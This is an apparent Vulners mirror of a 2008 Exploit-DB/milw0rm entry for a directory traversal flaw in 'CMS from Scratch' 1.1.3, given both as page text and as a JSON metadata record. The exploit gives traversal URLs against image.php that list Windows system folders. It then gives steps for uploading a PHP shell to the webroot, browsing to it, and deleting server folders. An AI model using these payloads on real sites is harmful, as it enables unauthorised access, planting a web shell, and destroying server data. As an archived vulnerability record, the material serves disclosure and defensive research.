Search...

CMS from Scratch <= 1.1.3 image.php Directory Traversal Vulnerability

2008-05-29T00:00:00

ID EDB-ID:5693
Type exploitdb
Reporter Stack
Modified 2008-05-29T00:00:00

Description

CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability. Webapps exploit for php platform

                                        
                                            ------------------------------------------------------------------------
   CMS from Scratch &lt;= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------
 
   author...: Stack
 mail.....: Wanted
 wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke &lt;==&gt; special THanks to EgiX For founded it :d:)

Exploit :
        #  http://localhost/path/cms/images.php?dir=c:
        Example :
        #  http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/
 
Exploit 2 :

          and you can upload php file ==&gt;  php shell
          for example upload the php shell in my localhost
         c:AppServ/www/
         you go to link
        #  http://localhost/path/cms/images.php?dir=c:AppServ/www/
         after click to colon [parcourir] after select your shell and click upload
         and go to link
        #  http://localhost/shell.php
      desc :you can delete all folder of server
      just clike to mark delete in folder selected to delete

 thx : allah 

# milw0rm.com [2008-05-29]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5693", "hash": "302efd7503ed2d3d37c9b45e788b4eb8", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CMS from Scratch <= 1.1.3 image.php Directory Traversal Vulnerability", "description": "CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability. Webapps exploit for php platform", "published": "2008-05-29T00:00:00", "modified": "2008-05-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/5693/", "reporter": "Stack", "references": [], "cvelist": [], "lastseen": "2016-01-31T23:27:01", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-01-31T23:27:01"}, "dependencies": {"references": [], "modified": "2016-01-31T23:27:01"}, "vulnersScore": 0.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5693/", "sourceData": "------------------------------------------------------------------------\n CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability\n------------------------------------------------------------------------\n \n author...: Stack\n mail.....: Wanted\n wanted by Egix\nGr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)\n\nExploit :\n # http://localhost/path/cms/images.php?dir=c:\n Example :\n # http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/\n \nExploit 2 :\n\n and you can upload php file ==> php shell\n for example upload the php shell in my localhost\n c:AppServ/www/\n you go to link\n # http://localhost/path/cms/images.php?dir=c:AppServ/www/\n after click to colon [parcourir] after select your shell and click upload\n and go to link\n # http://localhost/shell.php\n desc :you can delete all folder of server\n just clike to mark delete in folder selected to delete\n\n thx : allah \n\n# milw0rm.com [2008-05-29]\n", "osvdbidlist": ["45753", "45751", "45750", "45752"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

CMS from Scratch &lt;= 1.1.3 image.php Directory Traversal Vulnerability

Description

CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability. Webapps exploit for php platform

CMS from Scratch <= 1.1.3 image.php Directory Traversal Vulnerability